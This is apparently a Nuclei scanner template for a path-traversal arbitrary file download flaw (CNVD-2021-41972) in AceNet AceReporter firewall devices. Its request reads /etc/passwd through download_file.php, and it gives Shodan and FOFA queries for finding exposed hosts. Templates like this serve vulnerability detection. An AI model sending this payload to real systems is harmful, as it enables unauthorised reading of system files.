2023-08-04 13:05:52 +00:00
|
|
|
id: CNVD-2021-41972
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: AceNet AceReporter Report - Arbitrary File Download
|
|
|
|
author: DhiyaneshDk
|
|
|
|
severity: high
|
|
|
|
description: |
|
|
|
|
All firewall devices that use the AceNet AceReporter report component can download arbitrary files
|
|
|
|
reference:
|
|
|
|
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972
|
|
|
|
- https://github.com/hktalent/scan4all/blob/main/lib/goby/goby_pocs/AceNet_AceReporter_Report_component_Arbitrary_file_download.txt
|
|
|
|
metadata:
|
2023-08-07 18:08:43 +00:00
|
|
|
verified: true
|
2023-10-14 11:27:55 +00:00
|
|
|
max-request: 1
|
2023-08-04 13:05:52 +00:00
|
|
|
shodan-query: http.favicon.hash:-1595726841
|
2023-10-14 11:27:55 +00:00
|
|
|
fofa-query: body="Login @ Reporter"
|
2024-01-14 09:21:50 +00:00
|
|
|
tags: cnvd2021,cnvd,acenet,acereporter,lfi
|
2023-08-04 13:05:52 +00:00
|
|
|
variables:
|
|
|
|
filename: "{{to_lower(rand_text_alpha(5))}}"
|
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename={{filename}}.txt"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
part: body
|
|
|
|
regex:
|
|
|
|
- "root:.*:0:0:"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- 'filename='
|
|
|
|
- 'application/octet-stream'
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-01-26 08:31:11 +00:00
|
|
|
# digest: 4b0a00483046022100b2f4c83664a3551071fd365e79502f07f19b3a4270b772692743ca3a78625e5d022100c95a9507e707152572170ea39f82bc646218bbb46f592fbad2474a04d797a37a:922c64590222798bb761d5b6d8e72950
|